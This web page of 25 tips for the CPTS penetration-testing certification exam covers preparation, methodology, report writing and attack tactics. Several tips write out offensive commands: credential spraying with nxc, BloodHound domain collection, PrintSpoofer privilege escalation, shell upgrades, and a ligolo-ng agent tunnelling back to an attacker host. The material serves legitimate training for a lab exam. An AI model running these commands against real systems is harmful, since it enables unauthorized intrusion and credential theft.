> CPTS Exam Tips
25 battle-tested strategies from CPTS passers. Read these before exam day.
Critical — exam-defining
Important — do this every time
Good practice — separates passers
// Pre-Exam Preparation
#01Preparation
Set Up Your Report Template BEFORE Exam Day
Install and configure SysReptor (or your preferred tool) the week before. Have a blank report with all sections pre-created: Executive Summary, Scope, Methodology, Finding Summary Table, and at least 10 empty finding slots. On exam day, you open it and start filling in data — not configuring tools.
#02Preparation
Build a Note-Taking Template with Sections for Every Host
Use CherryTree or Obsidian with a template: Host IP, Open Ports, Services, Credentials Found, Vulnerabilities, Flags, and Draft Finding. Create the node before you enumerate — paste data in as you discover it. Searching your notes at hour 60 of the exam is 10x faster than scanning grep history.
#03Preparation
Test Your VPN and Lab Access 12 Hours Before Start
Connect to the HTB VPN, verify
tun0 is up, ping the lab gateway. Exam day VPN issues happen. Knowing your setup works means any exam-day problem is environment, not configuration. Have the HTB support contact ready.
#04Preparation
Pre-Stage Your Tools — Don't Install During the Exam
Verify these work before exam day:
nmap, ffuf, bloodhound-python, impacket (all tools), evil-winrm, chisel, ligolo-ng, certipy, nxc (NetExec), mimikatz, rubeus, hashcat. Install Sliver or Metasploit for C2. Downloading tools during the exam wastes precious time.
#05Preparation
Practice Writing One Full Finding Before the Exam
Take any HTB machine you've rooted and write a professional finding for the initial foothold. Title, CVSS, affected host, PoC steps, business impact, remediation. Time yourself. If it takes more than 20 minutes, practice more. The exam requires 5-10 findings in the report.
// During the Exam — Methodology
#06Methodology
Read the Scope Document First — Completely
Before scanning a single host, read the entire exam brief. Know exactly which IPs are in scope, which are out of scope, what credentials you've been given, and the network topology. CPTS is grey-box — you will receive starting credentials. Missing this costs hours.
#07Methodology
Screenshot Everything — As You Go, Not Retrospectively
Every pivotal action needs a screenshot: initial shell gained (showing hostname + whoami/id), every privilege escalation proof, every lateral move, every credential found, every flag. The report reviewer must reproduce your work. Lab access expires — you cannot go back.
#08Methodology
Allocate Days 9-10 Purely for Report Writing
The exam is 10 days. Stop exploiting by end of day 8 and spend two full days on the report. A well-written report beats a sloppy one with more flags. The report IS the submission — reviewers cannot credit what they cannot verify.
#09Methodology
Write Draft Findings AS You Discover Vulnerabilities
When you exploit something, open SysReptor/your report and write a draft finding immediately — even 3 sentences. Title, what you ran, what you got. You will have 100x better recall writing it at hour 10 than at hour 200 when you're exhausted and trying to reconstruct the attack chain.
#10Methodology
Use the Two-Pass Nmap Method on Every Target
Pass 1:
nmap -p- --min-rate 10000 -oA host/full IP. Pass 2: nmap -sV -sC -O -p [ports] -oA host/targeted IP. Never skip -p-. Missing a service on a non-standard port because you only scanned top-1000 is the most common preventable CPTS failure.
#11Methodology
Spray Every Credential Against Every Service
Every password you find gets sprayed immediately against: SMB, SSH, WinRM, RDP, FTP, web apps, MSSQL, MySQL, and any other open service. Use
nxc smb 10.10.10.0/24 -u user -p pass for network-wide spray. Credential reuse is extremely common — it's an intended exam mechanic.
#12Methodology
Keep a Running Credential Log
Maintain a table in your notes: Username | Password/Hash | Source | Services Tested | Works On. Every credential from every source goes here. At exam hour 50, when you're stuck, this table often contains your next move that you forgot about from hour 15.
// Technical Tactics
#13Technical
Add Every Discovered Hostname to /etc/hosts Immediately
Many CPTS targets serve completely different content based on the Host header (virtual host routing).
echo '10.10.10.5 target.htb admin.target.htb' >> /etc/hosts. Always attempt VHost fuzzing too — many machines have a hidden admin or dev VHost as the intended entry point.
#14Technical
Run BloodHound Collection Immediately After AD Access
bloodhound-python -u user -p pass -d domain.local -c all -ns DC_IP. Do this as soon as you have any domain credential — even low-privilege. BloodHound shortest path analysis from your compromised user to Domain Admins reveals the entire attack chain. Look for: Kerberoastable accounts, AS-REP Roastable accounts, AdminTo edges, DCSync rights.
#15Technical
Check sudo -l Before Any Complex Privilege Escalation
sudo -l takes 1 second and is the fastest Linux privesc check. If any binary is listed with NOPASSWD, check GTFOBins immediately. Vim, find, python, awk, bash, tar, nmap — all have GTFOBins shell escape techniques. This resolves 30% of Linux privesc in under 60 seconds.
#16Technical
Check SeImpersonatePrivilege on Every Windows Shell
Run
whoami /priv immediately on every Windows shell. SeImpersonatePrivilege (common for service accounts, IIS, MSSQL) → PrintSpoofer or GodPotato for instant SYSTEM. .\PrintSpoofer.exe -i -c cmd. This privilege is present on 60%+ of CPTS Windows boxes.
#17Technical
Upgrade Every Linux Shell to a Full PTY Immediately
Without PTY upgrade: tab completion fails, Ctrl+C kills your shell, su fails, text editors crash. Upgrade: (1)
python3 -c 'import pty;pty.spawn("/bin/bash")', (2) Ctrl+Z, (3) stty raw -echo; fg, (4) export TERM=xterm. Alternatively: script /dev/null -c bash.
#18Technical
When Stuck on Web Apps — Check Source Code and JS Files
Right-click > View Page Source. Look for: API endpoints in JavaScript, hidden form fields, commented-out paths, admin routes. Use DevTools Network tab to capture all XHR/fetch requests. Run
curl app.js | grep -E 'api|endpoint|key|token|admin'. API endpoints often have missing auth on non-obvious methods.
#19Technical
Use Ligolo-ng for Pivoting — It's Faster Than Chisel
Ligolo-ng creates a full TUN interface — no proxychains needed. All tools work natively. Setup:
./proxy -selfcert on attacker, ./agent -connect ATTACKER:11601 -ignore-cert on target. Then in ligolo console: session, start, add route ip route add 172.16.0.0/24 dev ligolo. Now scan the internal subnet directly.
#20Technical
Run winPEAS and linPEAS — But Read the Output Carefully
These tools generate hundreds of lines. Focus on: RED items (critical findings), credential sections (grep for 'password' in output), service misconfigurations, scheduled tasks, and registry entries. Pipe to file:
.\winPEAS.exe > peas.txt, then grep. Don't blindly execute every suggestion.// Report Writing
#21Reporting
Every Finding Needs: Title, CVSS, PoC, Impact, Remediation
Minimum viable finding: Specific title (not "web issue" — "Stored XSS in Comment Field Allows Session Hijacking"), CVSS 3.1 score with vector, affected host(s), numbered PoC steps with screenshots, business impact in non-technical language, specific remediation steps. Missing any of these gets findings downgraded or rejected.
#22Reporting
Executive Summary Must Have ZERO Technical Jargon
Write for a non-technical C-level reader who has never heard of "Kerberoasting" or "SQLi". Use: "An attacker without a valid account could access the payroll database" — not "Unauthenticated SQL injection on the login endpoint". One paragraph, overall risk rating, top 3 business impacts, recommended priority action.
#23Reporting
Include a Finding Summary Table with Color-Coded Severity
A table listing all findings by title, severity, affected host, and remediation status. This lets busy executives scan the entire report in 60 seconds. SysReptor generates this automatically. If writing manually, use: Critical (red), High (orange), Medium (yellow), Low (blue), Info (gray).
#24Reporting
Proofread Twice — Typos Undermine Credibility
A report with spelling errors signals carelessness to reviewers. Run spellcheck in your word processor. Read each finding aloud to catch awkward phrasing. Have someone else read the executive summary. Proofread AFTER a full night's sleep — your tired eyes miss errors your rested eyes catch.
#25Reporting
Test Your PDF Export Before Submission
Export your report to PDF and open it. Verify: all screenshots render (not broken images), code blocks don't overflow page margins, table formatting is intact, all sections are present, page numbers are correct, the cover page has the correct date and assessment type. PDF rendering bugs discovered at submission time are catastrophic.
// REMEMBER — The CPTS exam tests methodology, not just technical skill. A professional report with clear findings from 70% of machines beats an undocumented full compromise. Think like a pentester, write like a consultant.